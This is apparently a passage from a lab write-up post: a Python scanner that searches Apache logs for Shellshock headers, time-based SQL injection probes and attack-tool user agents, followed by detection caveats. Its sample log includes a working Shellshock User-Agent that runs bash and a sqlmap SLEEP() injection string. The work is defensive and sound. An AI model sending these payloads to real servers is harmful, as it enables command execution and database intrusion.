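Finding = namedtuple("Finding", "ip rule detail")

# Apache "combined" format: the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# CVE-2014-6271: an exported function definition at the start of a header value.
# mod_cgi hands request headers to the script as environment variables, which is
# why a User-Agent string reaches bash at all.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Time-based blind SQL injection probes; the sqlmap payload on this machine uses SLEEP().
SQLI_TIME_RE = re.compile(r"(?i)\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay")
# Tool names that appear in the default user agents of the scanners used above.
SCANNER_UA_RE = re.compile(r"(?i)\b(gobuster|sqlmap|nikto)\b")

# Constructed sample log (not captured from the target); the attacker IP is the
# Kali box from the reverse-shell command on the page.
SAMPLE_LOG = [
    '192.168.56.206 - - [06/Jan/2023:09:57:00 -0500] "GET /home.php HTTP/1.1" '
    '200 5345 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [06/Jan/2023:09:59:17 -0500] "GET /edit_customer.php?cust_id='
    '1%20AND%20%28SELECT%209791%20FROM%20%28SELECT%28SLEEP%285%29%29%29dUkE%29 HTTP/1.1" '
    '302 8163 "-" "sqlmap/1.6.12#stable (https://sqlmap.org)"',
    '192.168.56.206 - - [06/Jan/2023:10:13:02 -0500] "GET /cgi-bin/backup.cgi HTTP/1.1" '
    '500 612 "-" "() { :; }; echo;echo;/bin/bash -c \'id\'"',
    "this line is not in combined format and must be skipped, not crash the scan",
]


def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    parts = fields["request"].split(" ", 2)
    # Query strings arrive percent-encoded; decode before matching so that
    # %28SLEEP%285%29 is seen as (SLEEP(5).
    fields["path"] = unquote_plus(parts[1] if len(parts) > 1 else parts[0])
    return fields


def scan_lines(lines):
    """Run the three rules over each parseable line and collect findings."""
    findings = []
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(f[header]):
                findings.append(
                    Finding(f["ip"], "shellshock", f"{header}={f[header]!r} status={f['status']}")
                )
        if SQLI_TIME_RE.search(f["path"]):
            findings.append(Finding(f["ip"], "sqli-time", f["path"]))
        if SCANNER_UA_RE.search(f["ua"]):
            findings.append(Finding(f["ip"], "scanner-ua", f["ua"]))
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(f"{finding.ip}  {finding.rule:<11} {finding.detail}")
```

Two caveats. Only Referer and User-Agent are recorded by the combined format, while the same function definition can arrive in any header mod_cgi exports (Cookie, Host, Accept and so on), so on a host that still serves CGI scripts, logging additional headers with %{Header}i, or filtering at a WAF, matters more than this after-the-fact scan. And a 500 on a /cgi-bin/ path paired with a function-definition header, which is the combination the nmap script output above shows, is a stronger signal than either on its own.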


Posted 2023-01-06 23:28 by Jason_huawen